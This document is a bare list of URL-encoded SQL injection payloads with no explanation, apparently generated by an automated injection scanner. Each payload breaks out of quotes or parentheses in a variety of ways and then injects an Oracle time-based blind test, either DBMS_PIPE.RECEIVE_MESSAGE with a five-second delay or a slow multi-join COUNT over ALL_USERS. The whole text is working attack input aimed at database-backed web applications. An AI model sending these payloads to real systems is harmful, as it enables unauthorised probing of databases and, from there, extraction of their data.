1%22%29%29%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20AND%20%28%28%22bbHC%22%20LIKE%20%22bbHC 1%22%29%29%29%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20AND%20%28%28%28%22mgBN%22%20LIKE%20%22mgBN 1%22%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20AND%20%22Ynff%22%20LIKE%20%22Ynff 1%25%27%29%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20AND%20%28%27%25%27%3D%27 1%25%27%29%29%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20AND%20%28%28%27%25%27%3D%27 1%25%27%29%29%29%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20AND%20%28%28%28%27%25%27%3D%27 1%25%27%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20AND%20%27%25%27%3D%27 1%00%27%29%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20AND%20%28%27Gtlq%27%3D%27Gtlq 1%00%27%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20AND%20%27KILj%27%3D%27KILj 1%27%29%20WHERE%209268%3D9268%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20--%20 1%22%29%20WHERE%209486%3D9486%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20--%20 1%27%20WHERE%201347%3D1347%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20--%20 1%22%20WHERE%207398%3D7398%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20--%20 1%27%7C%7C%28SELECT%20%27davy%27%20FROM%20DUAL%20WHERE%208655%3D8655%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20%29%7C%7C%27 1%27%7C%7C%28SELECT%20%27ClnP%27%20WHERE%201045%3D1045%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20%29%7C%7C%27 1%27%2B%28SELECT%20kBuF%20WHERE%204747%3D4747%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20%29%2B%27 1%27%2B%28SELECT%20%27pRSp%27%20WHERE%206409%3D6409%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20%29%2B%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%203474%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28122%29%7C%7CCHR%28110%29%7C%7CCHR%2883%29%2C5%29%20%23 1%29%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%29%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%29%29%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%29%29%29%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%29%20WHERE%203014%3D3014%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%20WHERE%204179%3D4179%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%27%29%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%27%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%22%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%27%29%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%27%29%29%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%27%29%29%29%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%27%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%27%29%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%27%29%29%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%27%29%29%29%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%27%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%22%29%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%22%29%29%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%22%29%29%29%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%22%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%22%29%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%22%29%29%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%22%29%29%29%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%22%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%25%27%29%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%25%27%29%29%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%25%27%29%29%29%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%25%27%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%00%27%29%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%00%27%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%27%29%20WHERE%207849%3D7849%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%22%29%20WHERE%203547%3D3547%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%27%20WHERE%207688%3D7688%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%22%20WHERE%207674%3D7674%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%27%7C%7C%28SELECT%20%27lwVF%27%20FROM%20DUAL%20WHERE%201260%3D1260%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%27%7C%7C%28SELECT%20%27YzlF%27%20WHERE%209232%3D9232%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%27%2B%28SELECT%20vGFi%20WHERE%201641%3D1641%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%27%2B%28SELECT%20%27oldy%27%20WHERE%206266%3D6266%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%27%20IN%20BOOLEAN%20MODE%29%20AND%208007%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28121%29%7C%7CCHR%28105%29%7C%7CCHR%28102%29%7C%7CCHR%28121%29%2C5%29-- 1%29%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 1%29%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%287915%3D7915 1%29%29%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%283712%3D3712 1%29%29%29%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%283100%3D3100 1%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 1%29%20WHERE%207193%3D7193%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 1%20WHERE%203916%3D3916%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 1%27%29%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 1%27%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 1%22%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 1%27%29%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27SuxD%27%3D%27SuxD 1%27%29%29%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%27IBeQ%27%3D%27IBeQ 1%27%29%29%29%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%27YqKP%27%3D%27YqKP 1%27%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27xSGb%27%3D%27xSGb 1%27%29%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27aeUQ%27%20LIKE%20%27aeUQ 1%27%29%29%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%27qksN%27%20LIKE%20%27qksN 1%27%29%29%29%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%27FnFJ%27%20LIKE%20%27FnFJ 1%27%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27AIth%27%20LIKE%20%27AIth 1%22%29%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%22qsKS%22%3D%22qsKS 1%22%29%29%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%22heZZ%22%3D%22heZZ 1%22%29%29%29%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%22QXzY%22%3D%22QXzY 1%22%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%22qQiU%22%3D%22qQiU 1%22%29%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%22zUXJ%22%20LIKE%20%22zUXJ 1%22%29%29%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%22aoxI%22%20LIKE%20%22aoxI 1%22%29%29%29%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%22GEuF%22%20LIKE%20%22GEuF 1%22%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%22EDqb%22%20LIKE%20%22EDqb 1%25%27%29%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27%25%27%3D%27 1%25%27%29%29%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%27%25%27%3D%27 1%25%27%29%29%29%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%27%25%27%3D%27 1%25%27%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27%25%27%3D%27 1%00%27%29%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27sYxV%27%3D%27sYxV 1%00%27%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27aIPf%27%3D%27aIPf 1%27%29%20WHERE%204680%3D4680%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 1%22%29%20WHERE%202657%3D2657%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 1%27%20WHERE%203541%3D3541%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 1%22%20WHERE%202694%3D2694%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20--%20 1%27%7C%7C%28SELECT%20%27gpUS%27%20FROM%20DUAL%20WHERE%201944%3D1944%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%29%7C%7C%27 1%27%7C%7C%28SELECT%20%27jiAZ%27%20WHERE%206891%3D6891%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%29%7C%7C%27 1%27%2B%28SELECT%20zrAJ%20WHERE%201375%3D1375%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%29%2B%27 1%27%2B%28SELECT%20%27APwb%27%20WHERE%208312%3D8312%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%29%2B%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%206961%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%23 1%29%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%29%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%29%29%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%29%29%29%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%29%20WHERE%201252%3D1252%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%20WHERE%204750%3D4750%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%27%29%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%27%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%22%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%27%29%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%27%29%29%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%27%29%29%29%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%27%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%27%29%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%27%29%29%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%27%29%29%29%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%27%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%22%29%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%22%29%29%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%22%29%29%29%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%22%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%22%29%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%22%29%29%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%22%29%29%29%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%22%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%25%27%29%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1%25%27%29%29%20AND%202074%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 